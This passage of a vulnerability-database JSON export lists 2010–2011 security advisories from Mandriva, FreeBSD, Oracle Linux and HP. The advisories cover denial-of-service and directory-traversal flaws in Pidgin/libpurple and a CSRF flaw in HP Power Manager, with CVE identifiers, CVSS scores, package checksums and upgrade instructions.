mes5/x86_64/pidgin-i18n-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 361a2e28134b872782d50db4d3f0a1b7 mes5/x86_64/pidgin-meanwhile-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n de494ae11a5e7b1330206750a4c03cc8 mes5/x86_64/pidgin-mono-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 8ed6ff0ea253660ee7739c135d44d072 mes5/x86_64/pidgin-perl-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n 30ab1f70aecff8cde722f64c38f9ebc1 mes5/x86_64/pidgin-plugins-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n c474ebab7d34c8876f0d12bf3650a68d mes5/x86_64/pidgin-silc-2.6.6-0.2mdvmes5.1.x86_64.rpm\r\n e557ac7501a2988206d7d38dd55fafe0 mes5/x86_64/pidgin-tcl-2.6.6-0.2mdvmes5.1.x86_64.rpm \r\n 9bf03f46569aeaf34845efb22c2d9142 mes5/SRPMS/pidgin-2.6.6-0.2mdvmes5.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFL8m1GmqjQ0CJFipgRAsSGAJoCz5GC0UIm6eNi+4P+8cnjmTQwBgCdHkId\r\no5UhPOXhuo9Ak9vMoxa1ERA=\r\n=bG3/\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-05-20T00:00:00", "title": "[ MDVSA-2010:097 ] pidgin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:34", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-1624"], "modified": "2010-05-20T00:00:00", "id": "SECURITYVULNS:DOC:23888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23888", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:36", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23888"], "description": "Crash on MSN emoticon messages parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-05-20T00:00:00", "title": "libpurple / Pidgin DoS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:36", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Pidgin", "version": "2.7", "operator": "eq"}], "cvelist": ["CVE-2010-1624"], "modified": "2010-05-20T00:00:00", "id": "SECURITYVULNS:VULN:10849", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10849", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:40", "references": ["https://vulners.com/securityvulns/securityvulns:doc:25707"], "description": "No description provided", "edition": 1, "reporter": "BUGTRAQ", "published": "2011-02-14T00:00:00", "title": "HP Power Manager crossite request forgery", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:40", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0277"], "modified": "2011-02-14T00:00:00", "id": "SECURITYVULNS:VULN:11427", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11427", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:35", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23033"], "description": "emoticon download directory traversal", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-01-13T00:00:00", "title": "libpurple / Pidgin / Adium directory traversal", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0013"], "modified": "2010-01-13T00:00:00", "id": "SECURITYVULNS:VULN:10513", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10513", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:39", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02711131\r\nVersion: 1\r\n\r\nHPSBMA02629 SSRT100381 rev.1 - HP Power Manager &#40;HPPM&#41; Running on Linux and Windows, Cross Site\r\nRequest Forgery &#40;CSRF&#41;\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-02-07\r\nLast Updated: 2011-02-07\r\n\r\nPotential Security Impact: Cross site request forgery &#40;CSRF&#41;\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Power Manager &#40;HPPM&#41; running on Linux\r\nand Windows. The vulnerability could result in a cross site request forgery &#40;CSRF&#41; leading to\r\nunauthorized administrative access.\r\n\r\nReferences: CVE-2011-0277, Secunia Advisory SA43058\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Power Manager, all versions\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-0277 &#40;AV:N/AC:L/Au:N/C:C/I:C/A:C&#41; 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Sow Ching Shiong via Secunia for reporting this vulnerability to\r\nsecurity-alert@hp.com.\r\n\r\nNote: The affected product is HP Power Manager &#40;HPPM&#41;. HP Power Manager &#40;HPPM&#41; enables users to\r\nmonitor, manage, and control power environments through comprehensive control of individual HP\r\nUninterruptible Power Systems &#40;UPSs&#41;. HPPM should not be confused with another product with a similar\r\nname: HP Insight Power Manager &#40;IPM&#41;\r\n\r\nRESOLUTION\r\n\r\nHP recommends the following:\r\n\r\nOpen a browser instance, log on to HPPM, perform needed task, and log off from HPPM\r\nDo not visit untrusted web sites while logged on to HPPM\r\nUse a firewall to limit access to HPPM\r\n\r\nIn addition accessing HPPM using HTTPS is recommended.\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 7 February 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running\r\nHP software products should be applied in accordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted\r\nusing PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP\r\nis continually reviewing and enhancing the security features of software products to provide customers\r\nwith current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that\r\nall users determine the applicability of this information to their individual situations and take\r\nappropriate action. HP does not warrant that this information is necessarily accurate or complete for\r\nall user situations and, consequently, HP will not be responsible for any damages resulting from user&#39;s\r\nuse or disregard of the information provided in this Bulletin. To the extent permitted by law, HP\r\ndisclaims all warranties, either express or implied, including the warranties of merchantability and\r\nfitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided &quot;as is&quot; without warranty of any kind. To the extent\r\npermitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost profits;damages relating to\r\nthe procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard\r\nCompany and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product and company names mentioned herein may\r\nbe trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk1QC1oACgkQ4B86/C0qfVn59gCfSBvSoUQFZbqrHOTjzIqN6XNJ\r\nDqIAoOeFlYLOT4syqUiR028TVFm83+pq\r\n=YeTH\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2011-02-14T00:00:00", "title": "[security bulletin] HPSBMA02629 SSRT100381 rev.1 - HP Power Manager &#40;HPPM&#41; Running on Linux and Windows, Cross Site Request Forgery &#40;CSRF&#41;", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:39", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-0277", "CVE-2010-0277"], "modified": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25707", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25707", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:002\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : pidgin\r\n Date : January 11, 2010\r\n Affected: 2010.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A security vulnerability has been identified and fixed in pidgin:\r\n \r\n Directory traversal vulnerability in slp.c in the MSN protocol\r\n plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows\r\n remote attackers to read arbitrary files via a .. &#40;dot dot&#41; in an\r\n application/x-msnmsgrp2p MSN emoticon &#40;aka custom smiley&#41; request,\r\n a related issue to CVE-2004-0122. NOTE: it could be argued that\r\n this is resultant from a vulnerability in which an emoticon download\r\n request is processed even without a preceding text/x-mms-emoticon\r\n message that announced availability of the emoticon &#40;CVE-2010-0013&#41;.\r\n \r\n This update provides pidgin 2.6.5, which is not vulnerable to this\r\n issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\r\n http://pidgin.im/news/security/\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2010.0:\r\n 0b141dc591a1677affc824e714c0bfa5 2010.0/i586/finch-2.6.5-0.1mdv2010.0.i586.rpm\r\n 3d851548d89644efdfb701ba90c468da 2010.0/i586/libfinch0-2.6.5-0.1mdv2010.0.i586.rpm\r\n 91a4b9783856ae2565c2cd3a9b27ebb6 2010.0/i586/libpurple0-2.6.5-0.1mdv2010.0.i586.rpm\r\n a0c9e1a42b96b117822968b581869513 2010.0/i586/libpurple-devel-2.6.5-0.1mdv2010.0.i586.rpm\r\n ec2f185f4aaf4a83fdd95d1ee5023c4c 2010.0/i586/pidgin-2.6.5-0.1mdv2010.0.i586.rpm\r\n aefdd5492a98e1823ba0c7286b3558b9 2010.0/i586/pidgin-bonjour-2.6.5-0.1mdv2010.0.i586.rpm\r\n 92599926774c68178a399e8e6b680029 2010.0/i586/pidgin-client-2.6.5-0.1mdv2010.0.i586.rpm\r\n 1d213714f4d9da85fd0bac7e793aa0d5 2010.0/i586/pidgin-gevolution-2.6.5-0.1mdv2010.0.i586.rpm\r\n a1e458dcd2c10987934208d9a18cd2b5 2010.0/i586/pidgin-i18n-2.6.5-0.1mdv2010.0.i586.rpm\r\n afc26ed9b344e3d4317fd7e32b88fa88 2010.0/i586/pidgin-meanwhile-2.6.5-0.1mdv2010.0.i586.rpm\r\n 3233cfec46020dbff5ef6f6fa4a4025e 2010.0/i586/pidgin-mono-2.6.5-0.1mdv2010.0.i586.rpm\r\n 48a5641b1104620aba0e2cbfa65a101f 2010.0/i586/pidgin-perl-2.6.5-0.1mdv2010.0.i586.rpm\r\n 44461abfbd8bc983a1e440a331ddc823 2010.0/i586/pidgin-plugins-2.6.5-0.1mdv2010.0.i586.rpm\r\n 80e0cedd0d60fe626dc5253db502e1bd 2010.0/i586/pidgin-silc-2.6.5-0.1mdv2010.0.i586.rpm\r\n 531a6537d9bf005ee54aece14aa48eb6 2010.0/i586/pidgin-tcl-2.6.5-0.1mdv2010.0.i586.rpm \r\n 83d0f2b5bb31e313c53c4d40ca8fe1da 2010.0/SRPMS/pidgin-2.6.5-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n e27d2817c814cf90bad7e205081402a2 2010.0/x86_64/finch-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 611f230ca512ad0db64acc14ef06e148 2010.0/x86_64/lib64finch0-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 8ae845e339ca97ebdd7f302eac3e5899 2010.0/x86_64/lib64purple0-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 525a83c8cb39f1b8a5c54d1ee91d5e49 \r\n2010.0/x86_64/lib64purple-devel-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 2ef31af24eb8a4c2706e67f941ad9fa3 2010.0/x86_64/pidgin-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n f8d2d37e7e9f070ec94339c2a3b6b8f0 2010.0/x86_64/pidgin-bonjour-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 45038a16defd0813f381fea1b184697a 2010.0/x86_64/pidgin-client-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 9f48d1a4af0d24195610a0392f721acb \r\n2010.0/x86_64/pidgin-gevolution-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 6c7d1fcb4f0ba1a1b32d04ecaf51ce59 2010.0/x86_64/pidgin-i18n-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 7efbc4ca6f8028476e6a842238d5e19c \r\n2010.0/x86_64/pidgin-meanwhile-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 58f135d340961f21b7b7a37931c7bf1d 2010.0/x86_64/pidgin-mono-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 798c84ae196fdedbeddb8d71374ce063 2010.0/x86_64/pidgin-perl-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 507b908bb81dc61cd633fccea1023314 2010.0/x86_64/pidgin-plugins-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n 48518b319bc1c5a5a452be9ceb522763 2010.0/x86_64/pidgin-silc-2.6.5-0.1mdv2010.0.x86_64.rpm\r\n b38b6ee90af7cee2298ba8f191b7fcc6 2010.0/x86_64/pidgin-tcl-2.6.5-0.1mdv2010.0.x86_64.rpm \r\n 83d0f2b5bb31e313c53c4d40ca8fe1da 2010.0/SRPMS/pidgin-2.6.5-0.1mdv2010.0.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFLS6HImqjQ0CJFipgRAtFeAKDDgB5ajBW96Sv5YBFoCprgN7m57gCbBWjf\r\naW7W6V/HuduwIHmOC3pXQhA=\r\n=uVD5\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2010-01-13T00:00:00", "title": "[ MDVSA-2010:002 ] pidgin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0013", "CVE-2004-0122"], "modified": "2010-01-13T00:00:00", "id": "SECURITYVULNS:DOC:23033", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23033", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:21", "references": ["http://pidgin.im/news/security/?id=44", "http://pidgin.im/news/security/?id=43", "http://pidgin.im/news/security/?id=45"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.6.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpurple", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "2.6.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "\nThree denial of service vulnerabilities where found in\n\t pidgin and allow remote attackers to crash the application.\n\t The developers summarized these problems as follows:\n\nPidgin can become unresponsive when displaying large\n\t numbers of smileys\n\n\nCertain nicknames in group chat rooms can trigger a\n\t crash in Finch\n\n\nFailure to validate all fields of an incoming message\n\t can trigger a crash\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2010-02-18T00:00:00", "title": "pidgin -- multiple remote denial of service vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-18T00:00:00", "id": "A2C4D3D5-4C7B-11DF-83FB-0015587E2CC1", "href": "https://vuxml.freebsd.org/freebsd/a2c4d3d5-4c7b-11df-83fb-0015587e2cc1.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:44:39", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "finch-2.6.6-1.el4.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-devel-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "pidgin-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "finch-devel-2.6.6-1.el4.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "src", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "src", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "src", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-perl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-tcl-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "pidgin-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-devel-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "finch-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "finch-2.6.6-1.el4.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "pidgin-devel-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "finch-2.6.6-1.el4.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "finch-devel-2.6.6-1.el4.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "pidgin-devel-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-2.6.6-1.el4.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "pidgin-perl-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.6-1.el4.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "pidgin-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "ia64", "packageFilename": "pidgin-perl-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "pidgin-2.6.6-1.el4.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageFilename": "libpurple-tcl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}], "description": "[2.6.6-1]\n- 2.6.6 with security and numerous minor bug fixes\n CVE-2010-0277 CVE-2010-0420 CVE-2010-0423\n- Bug #528796: Get rid of #!/usr/bin/env python ", "edition": 3, "reporter": "Oracle", "published": "2010-02-18T00:00:00", "title": "pidgin security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-18T00:00:00", "id": "ELSA-2010-0115", "href": "http://linux.oracle.com/errata/ELSA-2010-0115.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:37:35", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "src", "packageFilename": "pidgin-2.6.5-1.el4.1.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "ia64", "packageFilename": "libpurple-perl-2.6.5-1.el4.1.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": 